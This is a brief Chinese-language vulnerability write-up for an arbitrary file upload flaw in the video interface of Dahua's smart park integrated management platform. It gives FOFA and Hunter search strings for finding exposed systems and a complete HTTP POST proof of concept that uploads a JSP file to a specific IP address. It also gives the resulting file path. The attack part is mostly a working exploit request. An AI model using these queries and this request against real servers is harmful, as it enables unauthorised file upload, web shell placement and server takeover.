漏洞描述
大华 智慧园区综合管理平台 video 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限
漏洞复现
fofa语句:"/WPMS/asset/lib/gridster/"
或app="dahua-智慧园区综合管理平台"
鹰图语句:web.body="/WPMS/asset/lib/gridster/"
登录页面如下:
POC:
POST /publishing/publishing/material/file/video HTTP/1.1
Host: 112.29.98.167:8009
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 804
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding: gzip, deflate
Connection: close
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Filedata"; filename="Test.jsp"
Test
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Submit"
submit
--dd8f988919484abab3816881c55272a7--
上传文件后的路径:/publishingImg/VIDEO/230812152005170200.jsp